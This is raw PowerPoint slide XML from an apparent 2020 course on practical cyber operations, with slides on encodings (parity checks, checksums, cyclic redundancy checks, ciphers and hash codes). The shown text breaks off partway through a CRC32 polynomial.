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1"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId42"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="277" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="276" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="274" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="280" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="298"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608321"/>
    <a:srgbClr val="75A0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94" y="-18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9C83D0F-1A90-4B0C-83B2-A1758E17A4FB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/13/2020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A6B7881-B6AE-489A-993D-5DB5D84A2297}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3628457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BBCE6A1-DA18-42C7-BFCF-999FA15D3959}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/13/2020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924941A-9D96-49DF-897A-B7FBB60B4B08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429038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4941A-9D96-49DF-897A-B7FBB60B4B08}"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2157332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3F7D07-9F69-4B45-A937-73E922733603}"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8DA8C1-EC82-49F5-947F-D2C094FED22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D4BB8-0507-45CF-80D5-B1E3631479A7}"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A54D07-83CA-418A-925E-50C77C6CAD2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8ECB0-F9C1-4C13-AB02-0E48FD8BCC7F}"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7B359F-D5A1-4B0F-8642-A9975A6E5543}"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CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>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14204-7905-4B56-9B16-1B1136C1676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CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>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539FCA-0D8B-40D7-9E3B-C6088D94CC25}"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E3FE4-CBE9-4DF2-843A-A4D636B3C4B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CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B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2250B-0E83-4BE8-9FDD-87569F51DE35}"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CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B7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C7A7E2D-210B-4B87-BA6A-13E54EF8DC82}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/13/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B75}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</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F0E42FC-4E2C-4324-A868-2EE1E72D6B7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CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</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3DD5EFA-AFEF-4B11-AFA0-473842909FF8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/13/2020</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ogle.com/search?q=parity+checks&amp;rlz=1C1GGRV_enUS756US756&amp;biw=1663&amp;bih=771&amp;sxsrf=ACYBGNRG_L3k19rm6Xrnr5irZu67SoMd4w:1580054208390&amp;tbm=isch&amp;source=iu&amp;ictx=1&amp;fir=MayiQsAe7cS_NM:,WUCj2jDIpqlt-M,_&amp;vet=1&amp;usg=AI4_-kQEsF_qbpMCL4GTt5ymn8mwjLz-Vw&amp;sa=X&amp;ved=2ahUKEwjWmMTO0KHnAhXpY98KHa0RAKgQ9QEwAHoECAYQAw#imgrc=MayiQsAe7cS_N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H1qjiwQldw"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68425"/>
            <a:ext cx="7924800" cy="1222375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Background materials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3124200"/>
            <a:ext cx="6461760" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>related to the projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="445167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077200" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>B.  Encodings (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>codes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2819400"/>
            <a:ext cx="6858000" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>to secure applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2626539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096962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encodings (codes)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1371600"/>
                <a:ext cx="8077200" cy="4800600"/>
              </a:xfrm>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="114300" indent="0" algn="ctr">
                  <a:buNone/>
                </a:pPr>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>input</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>.</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>string</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" b="0" i="1" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>   </m:t>
                    </m:r>
                    <m:groupChr>
                      <m:groupChrPr>
                        <m:chr m:val="→"/>
                        <m:vertJc m:val="bot"/>
                        <m:ctrlPr>
                          <a:rPr lang="en-US" b="0" i="1" smtClean="0">
                            <a:solidFill>
                              <a:schemeClr val="accent2">
                                <a:lumMod val="50000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                        </m:ctrlPr>
                      </m:groupChrPr>
                      <m:e>
                        <m:r>
                          <m:rPr>
                            <m:brk m:alnAt="2"/>
                          </m:rPr>
                          <a:rPr lang="en-US" b="0" i="1" smtClean="0">
                            <a:solidFill>
                              <a:schemeClr val="accent2">
                                <a:lumMod val="50000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑒</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="en-US" b="0" i="1" smtClean="0">
                            <a:solidFill>
                              <a:schemeClr val="accent2">
                                <a:lumMod val="50000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑛𝑐𝑜𝑑𝑒</m:t>
                        </m:r>
                      </m:e>
                    </m:groupChr>
                    <m:r>
                      <a:rPr lang="en-US" b="0" i="1" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t> </m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>  </m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>output</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>.</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="accent2">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>string</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0" algn="ctr">
                  <a:spcBef>
                    <a:spcPts val="1800"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="600"/>
                  </a:spcAft>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Applications</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="571500" indent="-457200">
                  <a:buFont typeface="+mj-lt"/>
                  <a:buAutoNum type="arabicPeriod"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>error-detection codes</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>no key (checksums, CRC)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="571500" indent="-457200">
                  <a:buFont typeface="+mj-lt"/>
                  <a:buAutoNum type="arabicPeriod"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>error-correction codes</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>n</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>o key, encode: one-to-one, decode: many-to-on</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="571500" indent="-457200">
                  <a:buFont typeface="+mj-lt"/>
                  <a:buAutoNum type="arabicPeriod"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>e</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>ncryption/decryption ciphers</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>keyed, invertible, encode: one-to-many (one), decode: many-to-one</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="571500" indent="-457200">
                  <a:buFont typeface="+mj-lt"/>
                  <a:buAutoNum type="arabicPeriod"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>hash codes</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="708660" lvl="2">
                  <a:buClr>
                    <a:schemeClr val="accent1"/>
                  </a:buClr>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>keyed, not invertible, hash: many-to-one</a:t>
                </a:r>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1371600"/>
                <a:ext cx="8077200" cy="4800600"/>
              </a:xfrm>
              <a:blipFill rotWithShape="1">
                <a:blip r:embed="rId2"/>
                <a:stretch>
                  <a:fillRect/>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4242929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50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection Codes             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Parity  Checks, Checksums</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="7620000" cy="3200400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>parity check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the process that ensures accurate data transmission between nodes during </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>communication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>parity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bit is appended to the original data bits to create an even or odd bit number; the number of bits with value one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>checksum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bitstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the XOR sum of the bits of the string. The sum may be negated by means of a ones’-complements operation prior to transmission to detect unintentional all-zero messages.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CIS4930/CIS5930 Practical Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Operstions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B75}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2277318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50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection Codes             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyclic Redundancy Checks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="7620000" cy="3200400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CRCs are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> popular because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>they are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> simple to implement in binary hardware, easy to analyze mathematically, and particularly good at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> common errors caused by noise in transmission channels. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the check value has a fixed length, the function that generates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> occasionally used as a hash function.</a:t>
            </a:r>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121098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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Error Detection Codes             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyclic Redundancy Checks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>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524000"/>
                <a:ext cx="8077200" cy="5105400"/>
              </a:xfrm>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="114300" indent="0" algn="ctr">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr fontAlgn="base"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>The polynomial for CRC32 is:</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0" algn="ctr" fontAlgn="base">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>  x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
                  <a:t>32</a:t>
